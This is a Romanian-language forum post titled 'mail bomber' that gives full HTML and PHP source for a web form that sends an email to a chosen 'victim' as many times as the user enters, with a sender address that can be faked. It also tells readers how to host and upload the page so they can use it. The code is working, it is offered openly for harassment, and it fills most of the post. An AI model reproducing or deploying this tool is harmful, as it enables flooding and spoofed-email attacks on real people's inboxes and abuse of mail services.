Jump to content
the_branch

mail bomber

Recommended Posts

intai faceti un cont pe un host cum ar fi www.lx.ro sau alt host care sa accepte php si sa aiba functia mail activata dupa care deschideti notepad si scrieti asta:

<html>
<head>
<title>Mailbomber</title>
<style>
body{
background-color:#000000; color:#666666; font-family:"Courier New", Courier, mono; font-size:13px;
}
input {
font-family:"Courier New", Courier, mono; color: #666666; background-color:#000000;
border: 1px solid #666666;
text-align:center;
}
</style>
</head>
<body>
<center>
<form name="hax" method="post">
[b]Adresa ta:[/b]

<input name="from" type="text" alt="Enter your e-mail address (or a spoofed one)"></input>

[b]Adresa victimei:[/b]

<input name="to" type="text" alt="The address you wish to bomb"></input>

[b]Subiect:[/b]

<input name="subject" type="text" alt="The subject of the emails"></input>
[b]Text:[/b]

<input name="body" type="text" alt="Body of the email"></input>
[b]De cate ori:[/b]

<input name="times" type="text" size="3" alt="Send how many times?"></input>


<input name="submit" type="submit" value="Submit">
</form>
</center>
</body>
</html>
<?php
$from = $_POST['from'];
$to = $_POST['to'];
$subject = $_POST['subject'];
$body = $_POST['body'];
$times = $_POST['times'];
$i = 0;
while($i < $times){
mail("$to", "$subject", "$body", "From: $from" );
$i++;
}
?>

Dupa ce scrieti asta in notepad salvati ca "index.php" si uploadati-l pe site cu ajutorul unui client ftp(de exemplu SmartFTP care se gaseste pe www.softpedia.com) apoi intrati pe link si scrieti adresa voastra de mail sau alta(poate fi folosit si ca fake mail >:)), adresa victimei, subiectul mail-ului, textul care vrei sa fie trimis victimei si de cate ori vrei sa fie trimis mail-ul. Sper ca v-am fost de ajutor :)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...